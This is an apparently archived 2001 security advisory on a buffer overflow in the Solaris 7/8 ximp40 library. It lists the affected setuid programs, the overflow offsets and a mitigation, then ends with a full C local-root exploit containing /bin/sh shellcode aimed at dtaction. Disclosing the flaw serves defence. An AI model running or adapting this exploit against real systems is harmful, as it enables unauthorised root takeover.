[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
 
 discussions
- read forum
- new topic
- search
 

 meetings
- meetings list
- recent additions
- add your info
 
 top 100 sites
- visit top sites
- sign up now
- members
 
 webmasters

- add your url
- add domain
- search box
- link to us

 
 projects
- our projects
- free email
 
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : Solaris7/8 ximp40 shared library buffer overflow

Title: Solaris7/8 ximp40 shared library buffer overflow
Released by: Shadow Penguin Security
Date: 31st January 2001
Printable version: Click here 
SPS Advisory #40



Solaris7/8 ximp40 shared library buffer overflow



UNYUN 

Shadow Penguin Security (http://shadowpenguin.backsection.net)



--------------------------------------------------------------



[Date]

Jan. 30, 2001



[Vulnerable]

Solaris 8 Intel & Sparc edition

Solaris 7 Intel & Sparc edition



[Not vulnerable]

unknown



[Overview]

   Shared library "ximp40" which is installed on Solaris7 and 8 by

default has buffer overflow bug, the local user can obtain root

privilege or mail gid by using the following suid/sgid programs which

are using the shared library ximp40.



*Solaris 8

suid root : /usr/dt/bin/dtaction

suid root : /usr/dt/bin/dtprintinfo

suid root : /usr/openwin/bin/sys-suspend

sgid mail : /usr/dt/bin/dtmail

sgid mail : /usr/openwin/bin/mailtool



*Solaris 7

suid root : /usr/dt/bin/dtaction

suid root : /usr/dt/bin/dtprintinfo

suid root : /usr/dt/bin/dtappgather

suid root : /usr/bin/admintool

suid root : /usr/openwin/bin/sys-suspend

sgid mail : /usr/dt/bin/dtmail

sgid mail : /usr/openwin/bin/mailtool



   The exploitable buffer overflow occurs when the long string is

specified to "arg0" of previous listed programs. This buffer overflow

overwrites the stack area which includes RET address, EIP can be

changed to the value which is specified inside arg0.



[Details]

  We explain this problem by /usr/dt/bin/dtaction which is installed

on Solaris8.

  This overflow becomes exploitable if the appropriate value is set in

 buffer offset 264 to 267, EIP can be changed to specified value which

 is located in buffer offset 260 to 263



[Avoidance]

  Clear the suid/sgid bit of all programs which are listed in [Overview].



[Caution]

   We will change this information without any notice. Use of this

information constitutes acceptance for use in an AS IS condition.

There are NO warranties with regard to this information. In no event

shall the author be liable for any damages whatever arising out of or

in connection with the use or spread of this information. Any use of

this information is only for personal experiment.



[Comments ?]

If you have something comments, please send to following address..



UNYUN 

http://shadowpenguin.backsection.net





[Sample code]

   This exploit obtain root privilege by using /usr/dt/bin/dtaction.

This is tested on Solaris8 Intel edition only.



/*====================================================================

   Solaris ximp40 shared library exploit for Solaris8 Intel Edition

   The Shadow Penguin Security (http://shadowpenguin.backsection.net)

   Written by UNYUN (shadowpenguin@backsection.net)

   [usage]

    #xhost +targethost

    #telnet targethost

    ...

    %setenv DISPLAY yourhost:0.0

    %gcc ximp40.c

    %./a.out

    0:Default value 1:Calculated value > 1   <- Input 0 or 1

  ====================================================================

*/



#include  



#define     BUF_SIZE        272

#define     EIP_OFFSET      260

#define     FAKE_OFFSET     264

#define     FAKE_VALUE      0x08046dec

#define     EIP_VALUE       0x08047cb4

#define     FAKE_VALUE_DIF  0xd9c

#define     EIP_VALUE_DIF   0x12c

#define     NOP             0x90



char    shell_code[]=

  "\xeb\x3b\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xc1"

  "\x88\x46\xc6\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x17\xe8\xdf"

  "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89"

  "\x5e\x08\x53\xb0\x3b\xe8\xc8\xff\xff\xff\x83\xc4\x0c\xe8\xc8\xff"

  "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff"

  "\xff\xff";



unsigned long get_sp(void)

{

  __asm__(" movl %esp,%eax ");

}



void valset(char *p,unsigned int val)

{

    *p=val&0xff;

    *(p+1)=(val>>8)&0xff;

    *(p+2)=(val>>16)&0xff;

    *(p+3)=(val>>24)&0xff;

}



main()

{

    char            buf[BUF_SIZE];

    unsigned int    esp=get_sp(),sw;



    memset(buf,NOP,BUF_SIZE);

    memcpy(buf+EIP_OFFSET-strlen(shell_code),shell_code,

           strlen(shell_code));



    printf("esp=%x\n",esp);

    printf("0:Default value 1:Calculated value >");

    fflush(stdout);

    scanf("%d",&sw);

    if (sw==0){

        valset(buf+FAKE_OFFSET, FAKE_VALUE);

        valset(buf+EIP_OFFSET , EIP_VALUE);

        printf("Jumping address = %x\n",EIP_VALUE);

    }else{

        valset(buf+FAKE_OFFSET, esp-FAKE_VALUE_DIF);

        valset(buf+EIP_OFFSET , esp+EIP_VALUE_DIF);

        printf("Jumping address = %x\n",esp+EIP_VALUE_DIF);

    }

    buf[BUF_SIZE-1]=0;



    execl("/usr/dt/bin/dtaction",buf,NULL);

}





-----

UNYUN

% The Shadow Penguin Security [ http://shadowpenguin.backsection.net ]

   shadowpenguin@backsection.net (SPS-Official)

   unyun@shadowpenguin.org (Personal)

% eEye Digital Security Team [ http://www.eEye.com ]

   unyun@eEye.com






(C) 1999-2000 All rights reserved.